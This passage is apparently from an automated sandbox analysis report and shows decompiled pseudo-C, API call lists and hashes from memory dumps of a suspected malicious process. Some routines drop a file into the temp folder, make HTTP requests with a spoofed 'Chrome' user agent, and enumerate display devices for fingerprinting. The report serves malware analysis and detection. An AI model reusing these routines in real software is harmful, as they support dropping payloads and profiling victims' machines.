                                              					if( *0x4149c4 == _t61 ||  *0x4149c8 == _t61) {
                                              						L20:
                                              						_t30 =  *0x4149bc;
                                              						if( *0x4149bc != _v12) {
                                              							_t34 = E00406443(_t30);
                                              							if(_t34 != 0) {
                                              								_t35 =  *_t34();
                                              								_v8 = _t35;
                                              								if(_t35 != 0) {
                                              									_t36 =  *0x4149c0;
                                              									if( *0x4149c0 != _v12) {
                                              										_t37 = E00406443(_t36);
                                              										if(_t37 != 0) {
                                              											_v8 =  *_t37(_v8);
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						goto L26;
                                              					} else {
                                              						_t77 = E00406443(_t29);
                                              						_t75 = E00406443( *0x4149c8);
                                              						if(_t77 == 0 || _t75 == 0) {
                                              							goto L20;
                                              						} else {
                                              							_t41 =  *_t77();
                                              							if(_t41 == 0) {
                                              								L15:
                                              								_t43 = E00406AA9( &_v20);
                                              								_pop(_t67);
                                              								if(_t43 != 0) {
                                              									_push(0);
                                              									_push(0);
                                              									_push(0);
                                              									_push(0);
                                              									_push(0);
                                              									E00405700(0, _t67, _t74, _t75);
                                              								}
                                              								if(_v20 < 4) {
                                              									_a12 = _a12 | 0x00040000;
                                              								} else {
                                              									_a12 = _a12 | 0x00200000;
                                              								}
                                              								L26:
                                              								_t31 = E00406443( *0x4149b8);
                                              								if(_t31 == 0) {
                                              									L28:
                                              									return 0;
                                              								}
                                              								return  *_t31(_v8, _a4, _a8, _a12);
                                              							}
                                              							_push( &_v24);
                                              							_push(0xc);
                                              							_push( &_v36);
                                              							_push(1);
                                              							_push(_t41);
                                              							if( *_t75() == 0 || (_v28 & 0x00000001) == 0) {
                                              								goto L15;
                                              							} else {
                                              								goto L20;
                                              							}
                                              						}
                                              					}
                                              				}
                                              				_t76 = LoadLibraryA("USER32.DLL");
                                              				if(_t76 == 0 || GetProcAddress(_t76, "MessageBoxA") == 0) {
                                              					goto L28;
                                              				} else {
                                              					_t48 = E004063CC(_t47);
                                              					 *_t79 = "GetActiveWindow";
                                              					 *0x4149b8 = _t48;
                                              					_t50 = E004063CC(GetProcAddress(??, ??));
                                              					 *_t79 = "GetLastActivePopup";
                                              					 *0x4149bc = _t50;
                                              					 *0x4149c0 = E004063CC(GetProcAddress(_t76, _t76));
                                              					_t54 = E00406A72( &_v16,  &_v16);
                                              					_pop(_t71);
                                              					if(_t54 != 0) {
                                              						_push(0);
                                              						_push(0);
                                              						_push(0);
                                              						_push(0);
                                              						_push(0);
                                              						E00405700(0, _t71, _t74, _t76);
                                              						_t79 = _t79 + 0x14;
                                              					}
                                              					if(_v16 == 2) {
                                              						_t56 = E004063CC(GetProcAddress(_t76, "GetUserObjectInformationA"));
                                              						 *0x4149c8 = _t56;
                                              						if(_t56 != 0) {
                                              							 *0x4149c4 = E004063CC(GetProcAddress(_t76, "GetProcessWindowStation"));
                                              						}
                                              					}
                                              					goto L8;
                                              				}
                                              			}






























                                              0x0040af20
                                              0x0040af36
                                              0x0040af39
                                              0x0040af3c
                                              0x0040af3f
                                              0x0040af42
                                              0x0040aff6
                                              0x0040aff6
                                              0x0040affb
                                              0x0040b000
                                              0x0040b07b
                                              0x0040b07b
                                              0x0040b083
                                              0x0040b086
                                              0x0040b08e
                                              0x0040b090
                                              0x0040b094
                                              0x0040b097
                                              0x0040b099
                                              0x0040b0a1
                                              0x0040b0a4
                                              0x0040b0ac
                                              0x0040b0b3
                                              0x0040b0b3
                                              0x0040b0ac
                                              0x0040b0a1
                                              0x0040b097
                                              0x0040b08e
                                              0x00000000
                                              0x0040b00a
                                              0x0040b016
                                              0x0040b021
                                              0x0040b023
                                              0x00000000
                                              0x0040b029
                                              0x0040b029
                                              0x0040b02d
                                              0x0040b048
                                              0x0040b04c
                                              0x0040b053
                                              0x0040b054
                                              0x0040b056
                                              0x0040b057
                                              0x0040b058
                                              0x0040b059
                                              0x0040b05a
                                              0x0040b05b
                                              0x0040b060
                                              0x0040b067
                                              0x0040b072
                                              0x0040b069
                                              0x0040b069
                                              0x0040b069
                                              0x0040b0b6
                                              0x0040b0bc
                                              0x0040b0c4
                                              0x0040b0d6
                                              0x00000000
                                              0x0040b0d6
                                              0x00000000
                                              0x0040b0d2
                                              0x0040b032
                                              0x0040b033
                                              0x0040b038
                                              0x0040b039
                                              0x0040b03b
                                              0x0040b040
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040b040
                                              0x0040b023
                                              0x0040b000
                                              0x0040af53
                                              0x0040af57
                                              0x00000000
                                              0x0040af73
                                              0x0040af74
                                              0x0040af79
                                              0x0040af81
                                              0x0040af89
                                              0x0040af8e
                                              0x0040af96
                                              0x0040afa3
                                              0x0040afac
                                              0x0040afb4
                                              0x0040afb5
                                              0x0040afb7
                                              0x0040afb8
                                              0x0040afb9
                                              0x0040afba
                                              0x0040afbb
                                              0x0040afbc
                                              0x0040afc1
                                              0x0040afc1
                                              0x0040afc8
                                              0x0040afd3
                                              0x0040afdb
                                              0x0040afe0
                                              0x0040aff1
                                              0x0040aff1
                                              0x0040afe0
                                              0x00000000
                                              0x0040afc8

                                              APIs
                                              • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 0040AF4D
                                              • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040AF69
                                                • Part of subcall function 004063CC: TlsGetValue.KERNEL32(00000000,00406441,00000000,0040AF2E,00000000,00000000,00000314,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 004063D9
                                                • Part of subcall function 004063CC: TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 004063F0
                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AF86
                                                • Part of subcall function 004063CC: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 00406405
                                                • Part of subcall function 004063CC: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00406420
                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AF9B
                                              • __invoke_watson.LIBCMT ref: 0040AFBC
                                                • Part of subcall function 00405700: _memset.LIBCMT ref: 0040578C
                                                • Part of subcall function 00405700: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 004057AA
                                                • Part of subcall function 00405700: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 004057B4
                                                • Part of subcall function 00405700: UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 004057BE
                                                • Part of subcall function 00405700: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 004057D9
                                                • Part of subcall function 00405700: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 004057E0
                                                • Part of subcall function 00406443: TlsGetValue.KERNEL32(?,00406ED3,004035FD,?,?,00401E38,00000000,?,?), ref: 00406450
                                                • Part of subcall function 00406443: TlsGetValue.KERNEL32(FFFFFFFF,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00406467
                                                • Part of subcall function 00406443: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040647C
                                                • Part of subcall function 00406443: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00406497
                                              • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 0040AFD0
                                              • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0040AFE8
                                              • __invoke_watson.LIBCMT ref: 0040B05B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                                              • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                              • API String ID: 2940365033-232180764
                                              • Opcode ID: 9dc9d6c9699a12b4101e6e517c17312217e972a6e614ab9b554892a8391cc6b4
                                              • Instruction ID: 1c028cbe132dd73ef92918e8f78929fa75bbb1dd901022f9e38424cc5d2cf97e
                                              • Opcode Fuzzy Hash: 9dc9d6c9699a12b4101e6e517c17312217e972a6e614ab9b554892a8391cc6b4
                                              • Instruction Fuzzy Hash: E94164B1D05205AACF20AFB59C85D6FBBA8EE44314F11493FE811F22D1DB3D89548B9E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 91%
                                              			E02B52AC6(void* __ebx, WCHAR* __ecx, void* __edx, void* __edi, void* __esi, long _a4) {
                                              				signed int _v8;
                                              				short _v528;
                                              				short _v1048;
                                              				short _v1568;
                                              				long _v1572;
                                              				void* _v1576;
                                              				WCHAR* _v1580;
                                              				signed int _t38;
                                              				long _t83;
                                              				WCHAR* _t84;
                                              				void* _t96;
                                              				void* _t97;
                                              				void* _t101;
                                              				void* _t106;
                                              				signed int _t111;
                                              
                                              				_t38 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t38 ^ _t111;
                                              				_v1576 = __edx;
                                              				_v1580 = __ecx;
                                              				if(GetTempPathW(0x104,  &_v1568) != 0) {
                                              					_t96 = 8;
                                              					E02B52A57( &_v528, _t96);
                                              					PathAppendW( &_v1568,  &_v528);
                                              					do {
                                              						_t97 = 0xa;
                                              						_v528 = 0;
                                              						_v1048 = 0;
                                              						E02B52A57( &_v528, _t97);
                                              						E02B52C9C( &_v1048,  &_v1568);
                                              						StrCatW( &_v1048,  &_v528);
                                              					} while (PathFileExistsW( &_v1048) != 0);
                                              					E02B52C9C( &_v1568,  &_v1048);
                                              					CreateDirectoryW( &_v1568, 0);
                                              					if(PathFileExistsW( &_v1568) != 0) {
                                              						_v528 = 0;
                                              						E02B52C9C( &_v528,  &_v1568);
                                              						_t101 = 6;
                                              						E02B52A57( &_v1048, _t101);
                                              						PathAppendW( &_v528,  &_v1048);
                                              						DeleteFileW( &_v528);
                                              						_t106 = CreateFileW( &_v528, 0x10000000, 0, 0, 2, 0, 0);
                                              						if(_t106 == 0xffffffff) {
                                              							goto L8;
                                              						} else {
                                              							_t83 = _a4;
                                              							_v1572 = 0;
                                              							if(WriteFile(_t106, _v1576, _t83,  &_v1572, 0) == 0 || _v1572 != _t83) {
                                              								CloseHandle(_t106);
                                              								goto L8;
                                              							} else {
                                              								__imp__GetLongPathNameW( &_v528,  &_v1048, 0x104);
                                              								_t84 = _v1580;
                                              								E02B52C9C(_t84,  &_v1048);
                                              								if(PathFileExistsW(_t84) != 0) {
                                              								}
                                              								CloseHandle(_t106);
                                              							}
                                              						}
                                              					}
                                              				}
                                              				return E02B53C33(_v8 ^ _t111);
                                              			}


















                                              0x02b52acf
                                              0x02b52ad6
                                              0x02b52adf
                                              0x02b52aeb
                                              0x02b52af9
                                              0x02b52b03
                                              0x02b52b0a
                                              0x02b52b23
                                              0x02b52b2b
                                              0x02b52b35
                                              0x02b52b36
                                              0x02b52b3d
                                              0x02b52b44
                                              0x02b52b55
                                              0x02b52b68
                                              0x02b52b77
                                              0x02b52b88
                                              0x02b52b97
                                              0x02b52ba8
                                              0x02b52bbc
                                              0x02b52bc3
                                              0x02b52bca
                                              0x02b52bd1
                                              0x02b52be4
                                              0x02b52bed
                                              0x02b52c0b
                                              0x02b52c10
                                              0x00000000
                                              0x02b52c12
                                              0x02b52c12
                                              0x02b52c24
                                              0x02b52c33
                                              0x02b52c3e
                                              0x00000000
                                              0x02b52c48
                                              0x02b52c5b
                                              0x02b52c61
                                              0x02b52c6f
                                              0x02b52c7d
                                              0x02b52c7d
                                              0x02b52c83
                                              0x02b52c89
                                              0x02b52c33
                                              0x02b52c10
                                              0x02b52c8d
                                              0x02b52c9b

                                              APIs
                                              • GetTempPathW.KERNEL32(00000104,?), ref: 02B52AF1
                                              • PathAppendW.SHLWAPI(?,?), ref: 02B52B23
                                              • StrCatW.SHLWAPI(?,?), ref: 02B52B68
                                              • PathFileExistsW.SHLWAPI(?), ref: 02B52B75
                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 02B52B97
                                              • PathFileExistsW.SHLWAPI(?), ref: 02B52BA4
                                              • PathAppendW.SHLWAPI(?,?), ref: 02B52BE4
                                              • DeleteFileW.KERNEL32(?), ref: 02B52BED
                                              • CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,00000000,00000000), ref: 02B52C05
                                              • WriteFile.KERNEL32(00000000,?,00001C00,?,00000000), ref: 02B52C2B
                                              • CloseHandle.KERNEL32(00000000), ref: 02B52C3E
                                              • GetLongPathNameW.KERNEL32(?,?,00000104), ref: 02B52C5B
                                              • PathFileExistsW.SHLWAPI(?), ref: 02B52C75
                                              • CloseHandle.KERNEL32(00000000), ref: 02B52C83
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Path$File$Exists$AppendCloseCreateHandle$DeleteDirectoryLongNameTempWrite
                                              • String ID:
                                              • API String ID: 706663521-0
                                              • Opcode ID: 3e4aec782e86c1b90e37532d9cef308f4dacd9b8f14d326197f801334e49dca3
                                              • Instruction ID: 0aabc731e3607d2a8cc736d9ac6f73d4216c9389469abae017c0bb598ebd4d65
                                              • Opcode Fuzzy Hash: 3e4aec782e86c1b90e37532d9cef308f4dacd9b8f14d326197f801334e49dca3
                                              • Instruction Fuzzy Hash: 05514EB190132D9ACB20DF60DC88BDEB77DEF88350F1445E5A909EB141EA309A95CF64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 82%
                                              			E00401310(struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
                                              				signed int _v4;
                                              				short _v524;
                                              				intOrPtr _v528;
                                              				int _v532;
                                              				void* _v536;
                                              				void* _v540;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t15;
                                              				void* _t18;
                                              				struct HBRUSH__* _t29;
                                              				void* _t30;
                                              				void* _t32;
                                              				void* _t34;
                                              				intOrPtr _t42;
                                              				void* _t44;
                                              				void* _t50;
                                              				struct HWND__* _t54;
                                              				void* _t55;
                                              				signed int _t59;
                                              
                                              				_t59 =  &_v540;
                                              				_t15 =  *0x413004; // 0x98fc836b
                                              				_v4 = _t15 ^ _t59;
                                              				_t18 = _a8 - 0x110;
                                              				_t42 = _a16;
                                              				_t54 = _a4;
                                              				if(_t18 == 0) {
                                              					_t50 = E00401220();
                                              					_v540 = _t50;
                                              					_v536 =  &_v540;
                                              					_v532 = 0;
                                              					_v528 = E004012C0;
                                              					E00403227( &_v540,  &_v524, L"%s License Agreement", _t42);
                                              					SetWindowTextW(_t54,  &_v524);
                                              					SendMessageW(GetDlgItem(_t54, 0x1f4), 0x435, 0, 0x100000);
                                              					SendMessageW(GetDlgItem(_t54, 0x1f4), 0x449, 2,  &_v536);
                                              					_push(_t50);
                                              					E00403199( &_v524, _t54, __eflags);
                                              					_t59 = _t59 + 0x10;
                                              					goto L13;
                                              				} else {
                                              					_t30 = _t18 - 1;
                                              					if(_t30 == 0) {
                                              						_t32 = (_a12 & 0x0000ffff) - 1;
                                              						__eflags = _t32;
                                              						if(_t32 == 0) {
                                              							EndDialog(_t54, 1);
                                              							goto L13;
                                              						} else {
                                              							_t34 = _t32 - 1;
                                              							__eflags = _t34;
                                              							if(_t34 == 0) {
                                              								EndDialog(_t54, 0);
                                              								goto L13;
                                              							} else {
                                              								__eflags = _t34 - 0x1f3;
                                              								if(__eflags == 0) {
                                              									E00401000(GetDlgItem(_t54, 0x1f4), __eflags);
                                              									L13:
                                              									_t29 = 1;
                                              								} else {
                                              									goto L8;
                                              								}
                                              							}
                                              						}
                                              					} else {
                                              						if(_t30 != 0x27 || _t42 != GetDlgItem(_t54, 0x1f4)) {
                                              							L8:
                                              							_t29 = 0;
                                              						} else {
                                              							_t29 = GetSysColorBrush(5);
                                              						}
                                              					}
                                              				}
                                              				_pop(_t55);
                                              				_pop(_t44);
                                              				E0040318A(_t29, _t44, _v4 ^ _t59, _t55);
                                              				return _t29;
                                              			}

























                                              0x00401310
                                              0x00401316
                                              0x0040131d
                                              0x0040132b
                                              0x00401331
                                              0x00401339
                                              0x00401341
                                              0x004013c5
                                              0x004013d5
                                              0x004013d9
                                              0x004013dd
                                              0x004013e5
                                              0x004013ed
                                              0x004013fb
                                              0x00401422
                                              0x00401439
                                              0x0040143b
                                              0x0040143c
                                              0x00401441
                                              0x00000000
                                              0x00401343
                                              0x00401343
                                              0x00401346
                                              0x00401372
                                              0x00401372
                                              0x00401375
                                              0x004013b3
                                              0x00000000
                                              0x00401377
                                              0x00401377
                                              0x00401377
                                              0x0040137a
                                              0x004013a5
                                              0x00000000
                                              0x0040137c
                                              0x0040137c
                                              0x00401381
                                              0x00401398
                                              0x00401445
                                              0x00401445
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00401381
                                              0x0040137a
                                              0x00401348
                                              0x0040134b
                                              0x00401383
                                              0x00401383
                                              0x0040135d
                                              0x0040135f
                                              0x0040135f
                                              0x0040134b
                                              0x00401346
                                              0x00401452
                                              0x00401453
                                              0x00401456
                                              0x00401461

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Item$MessageSend$BrushColorDialogTextWindow__swprintf
                                              • String ID: %s License Agreement
                                              • API String ID: 2951897483-1285993597
                                              • Opcode ID: b222d6317158b18de7cdf78b0e5675ac59ac6db589ad6d1fb58f5eea72f61197
                                              • Instruction ID: 1530dd87393cf7f224303f11dcabdbff35385f3a88108dc3a53a8d27bff466c6
                                              • Opcode Fuzzy Hash: b222d6317158b18de7cdf78b0e5675ac59ac6db589ad6d1fb58f5eea72f61197
                                              • Instruction Fuzzy Hash: D031F6715843016BD310AFA89D49FAF76D8AB8C708F10493EF645B62E0DB7CDA05866F
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 93%
                                              			E02B5197B(void* __ebx, WCHAR* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                              				signed int _v8;
                                              				short _v268;
                                              				short _v524;
                                              				short _v1036;
                                              				char _v1556;
                                              				short _v5724;
                                              				char _v9892;
                                              				void* _v9896;
                                              				WCHAR* _v9900;
                                              				void _v9904;
                                              				intOrPtr _v9908;
                                              				long _v9912;
                                              				long _v9916;
                                              				intOrPtr _v9928;
                                              				WCHAR* _v9932;
                                              				intOrPtr _v9936;
                                              				WCHAR* _v9940;
                                              				intOrPtr _v9944;
                                              				WCHAR* _v9948;
                                              				short _v9952;
                                              				intOrPtr _v9956;
                                              				WCHAR* _v9960;
                                              				intOrPtr _v9964;
                                              				void* _v9976;
                                              				signed int _t60;
                                              				void* _t71;
                                              				void* _t72;
                                              				void* _t79;
                                              				long _t84;
                                              				int _t88;
                                              				intOrPtr _t89;
                                              				void* _t94;
                                              				intOrPtr _t100;
                                              				WCHAR* _t107;
                                              				WCHAR* _t111;
                                              				intOrPtr* _t114;
                                              				void* _t117;
                                              				long _t121;
                                              				signed int _t122;
                                              
                                              				E02B53F00();
                                              				_t60 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t60 ^ _t122;
                                              				_push(__ebx);
                                              				_push(__esi);
                                              				_push(__edi);
                                              				_t114 = _a8;
                                              				_v9908 = _a4;
                                              				_v9904 = _v9904 & 0;
                                              				_v9900 = __ecx;
                                              				_t117 = 0x3c;
                                              				_v1036 = 0;
                                              				_v524 = 0;
                                              				_v268 = 0;
                                              				_v9892 = 0;
                                              				_v5724 = 0;
                                              				_v1556 = 0;
                                              				_v9916 = 4;
                                              				E02B52CE7(0,  &_v9976, _t117);
                                              				_v9976 = _t117;
                                              				_v9960 =  &_v1036;
                                              				_t20 = _t117 + 0x44; // 0x80
                                              				_t100 = _t20;
                                              				_v9948 =  &_v524;
                                              				_v9944 = _t100;
                                              				_v9940 =  &_v268;
                                              				_v9936 = _t100;
                                              				_v9956 = 0x100;
                                              				_v9932 =  &_v9892;
                                              				_t94 = 0;
                                              				_v9928 = 0x824;
                                              				_v9912 = 0;
                                              				_v9896 = 0;
                                              				if(_t114 != 0) {
                                              					if(InternetCrackUrlW(_v9900, 0, 0,  &_v9976) == 0 || _v9964 != 3 && _v9964 != 4) {
                                              						_t119 = 0;
                                              						goto L19;
                                              					} else {
                                              						_t121 =  ==  ? 0x80803000 : 0x80000000;
                                              						_v9900 = _t121;
                                              						_t79 = InternetOpenW(L"Chrome", 0, 0, 0, 0);
                                              						_v9912 = _t79;
                                              						if(_t79 != 0) {
                                              							_t94 = InternetConnectW(_t79,  &_v1036, _v9952,  &_v524,  &_v268, 3, 0, 0);
                                              							if(_t94 != 0) {
                                              								_t107 =  &_v5724;
                                              								_t111 = _v9932;
                                              								if(_v9928 == 0) {
                                              									_t111 = "/";
                                              								}
                                              								E02B52C9C(_t107, _t111);
                                              								_v9896 = HttpOpenRequestW(_t94, L"HEAD",  &_v5724, L"HTTP/1.1", 0x2b542bc, 0, _t121, 0);
                                              								_t84 = E02B514D8(_t83);
                                              								_t119 = _t84;
                                              								if(_t84 == 0) {
                                              									L19:
                                              									_t71 = _v9896;
                                              									if(_t71 != 0) {
                                              										InternetCloseHandle(_t71);
                                              									}
                                              									if(_t94 != 0) {
                                              										InternetCloseHandle(_t94);
                                              									}
                                              									L23:
                                              									_t72 = _v9912;
                                              									if(_t72 != 0) {
                                              										InternetCloseHandle(_t72);
                                              									}
                                              									L25:
                                              									goto L26;
                                              								} else {
                                              									_t119 = 0;
                                              									_t88 = HttpQueryInfoW(_v9896, 0x20000005,  &_v9904,  &_v9916, 0);
                                              									_t89 = _v9904;
                                              									if(_t88 == 0) {
                                              										L17:
                                              										_t119 = E02B51564(_t94, _t94,  &_v5724, _t114, _t119, _t119, _t119, _t89 - 1, _v9908, 1,  &_v1556, _v9900);
                                              										goto L19;
                                              									}
                                              									if(_t89 > 0x3e800000) {
                                              										goto L19;
                                              									}
                                              									if(_t114 == 0) {
                                              										goto L17;
                                              									}
                                              									 *_t114 = _t89;
                                              									if( *_t114 >= _t89) {
                                              										goto L17;
                                              									}
                                              									_t119 = 3;
                                              									goto L19;
                                              								}
                                              							}
                                              							_t119 = 0;
                                              							goto L23;
                                              						}
                                              						_t119 = 0;
                                              						goto L25;
                                              					}
                                              				} else {
                                              					L26:
                                              					return E02B53C33(_v8 ^ _t122);
                                              				}
                                              			}










































                                              0x02b51983
                                              0x02b51988
                                              0x02b5198f
                                              0x02b51995
                                              0x02b51996
                                              0x02b51997
                                              0x02b51998
                                              0x02b5199d
                                              0x02b519a5
                                              0x02b519ab
                                              0x02b519b7
                                              0x02b519b9
                                              0x02b519c0
                                              0x02b519c7
                                              0x02b519ce
                                              0x02b519d5
                                              0x02b519dc
                                              0x02b519e3
                                              0x02b519ed
                                              0x02b519f8
                                              0x02b519fe
                                              0x02b51a0b
                                              0x02b51a0b
                                              0x02b51a0e
                                              0x02b51a1a
                                              0x02b51a20
                                              0x02b51a2b
                                              0x02b51a39
                                              0x02b51a43
                                              0x02b51a49
                                              0x02b51a4b
                                              0x02b51a55
                                              0x02b51a5b
                                              0x02b51a63
                                              0x02b51a83
                                              0x02b51bcd
                                              0x00000000
                                              0x02b51a9f
                                              0x02b51aab
                                              0x02b51ab9
                                              0x02b51abf
                                              0x02b51ac5
                                              0x02b51acd
                                              0x02b51afc
                                              0x02b51b00
                                              0x02b51b10
                                              0x02b51b16
                                              0x02b51b1c
                                              0x02b51b1e
                                              0x02b51b1e
                                              0x02b51b23
                                              0x02b51b4c
                                              0x02b51b52
                                              0x02b51b57
                                              0x02b51b5b
                                              0x02b51bcf
                                              0x02b51bcf
                                              0x02b51bd7
                                              0x02b51bda
                                              0x02b51bda
                                              0x02b51be2
                                              0x02b51be5
                                              0x02b51be5
                                              0x02b51beb
                                              0x02b51beb
                                              0x02b51bf3
                                              0x02b51bf6
                                              0x02b51bf6
                                              0x02b51bfc
                                              0x00000000
                                              0x02b51b5d
                                              0x02b51b5d
                                              0x02b51b7a
                                              0x02b51b82
                                              0x02b51b88
                                              0x02b51ba0
                                              0x02b51bc9
                                              0x00000000
                                              0x02b51bc9
                                              0x02b51b8f
                                              0x00000000
                                              0x00000000
                                              0x02b51b93
                                              0x00000000
                                              0x00000000
                                              0x02b51b97
                                              0x02b51b99
                                              0x00000000
                                              0x00000000
                                              0x02b51b9d
                                              0x00000000
                                              0x02b51b9d
                                              0x02b51b5b
                                              0x02b51b02
                                              0x00000000
                                              0x02b51b02
                                              0x02b51acf
                                              0x00000000
                                              0x02b51acf
                                              0x02b51a65
                                              0x02b51bfe
                                              0x02b51c0e
                                              0x02b51c0e

                                              APIs
                                              • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 02B51A7B
                                              • InternetOpenW.WININET(Chrome,00000000,00000000,00000000,00000000), ref: 02B51ABF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Internet$CrackOpen
                                              • String ID: Chrome$HEAD$HTTP/1.1
                                              • API String ID: 1262293563-235090430
                                              • Opcode ID: 50d5ac6dbc366125e64432129b8f65557aa5226a81ff2c8b21f5f979119d38df
                                              • Instruction ID: 7f87f8814b9e4fb43dd751766a7f575f91f22ce08e8aa2ce59a7a9b6a68a3b16
                                              • Opcode Fuzzy Hash: 50d5ac6dbc366125e64432129b8f65557aa5226a81ff2c8b21f5f979119d38df
                                              • Instruction Fuzzy Hash: EE610A75D116399FDB25DF689C88BEAB7B8EB14244F0005EAE90DEB200EB715EC48F51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 55%
                                              			E02B52E5C(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                              				signed int _v8;
                                              				char _v516;
                                              				struct _DISPLAY_DEVICEA _v940;
                                              				char _v1328;
                                              				char _v1360;
                                              				long _v1364;
                                              				signed int _v1368;
                                              				intOrPtr _v1372;
                                              				signed int _t28;
                                              				char _t60;
                                              				long _t61;
                                              				CHAR* _t78;
                                              				signed int _t80;
                                              				signed int _t82;
                                              
                                              				_t82 = (_t80 & 0xfffffff8) - 0x55c;
                                              				_t28 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t28 ^ _t82;
                                              				_push(1);
                                              				_t78 = __ecx;
                                              				_v1364 = 0x1a8;
                                              				_push( &_v1364);
                                              				_push(0);
                                              				_t60 = 0;
                                              				 *((char*)(__ecx)) = 0;
                                              				_push(0);
                                              				while(1) {
                                              					_v1372 = _t60;
                                              					if(EnumDisplayDevicesA(??, ??, ??, ??) == 0) {
                                              						break;
                                              					}
                                              					E02B52CE7(_t31,  &_v940, 0x1a8);
                                              					_v1368 = _v1368 & 0x00000000;
                                              					 *_t82 = "--";
                                              					_v940.cb = 0x1a8;
                                              					_v516 = 0;
                                              					lstrcatA( &_v516, ??);
                                              					lstrcatA( &_v516,  &_v1360);
                                              					lstrcatA( &_v516, "--");
                                              					lstrcatA( &_v516,  &_v1328);
                                              					lstrcatA( &_v516, "--");
                                              					E02B52D16(_t78,  &_v516, 0x1c2);
                                              					if(EnumDisplayDevicesA( &_v1360, 0,  &_v940, 1) != 0) {
                                              						_t61 = _v1368;
                                              						do {
                                              							lstrcatA(_t78,  &(_v940.DeviceName));
                                              							lstrcatA(_t78, "--");
                                              							E02B52D16(_t78,  &(_v940.DeviceString), 0x28a);
                                              							_t61 = _t61 + 1;
                                              						} while (EnumDisplayDevicesA( &_v1360, _t61,  &_v940, 1) != 0);
                                              						_t60 = _v1372;
                                              					}
                                              					GetLastError();
                                              					_push(1);
                                              					_t60 = _t60 + 1;
                                              					_push( &_v1364);
                                              					_push(_t60);
                                              					_push(0);
                                              				}
                                              				return E02B53C33(_v8 ^ _t82);
                                              			}

















                                              0x02b52e62
                                              0x02b52e68
                                              0x02b52e6f
                                              0x02b52e83
                                              0x02b52e85
                                              0x02b52e87
                                              0x02b52e91
                                              0x02b52e92
                                              0x02b52e93
                                              0x02b52e95
                                              0x02b52e97
                                              0x02b52fb1
                                              0x02b52fb1
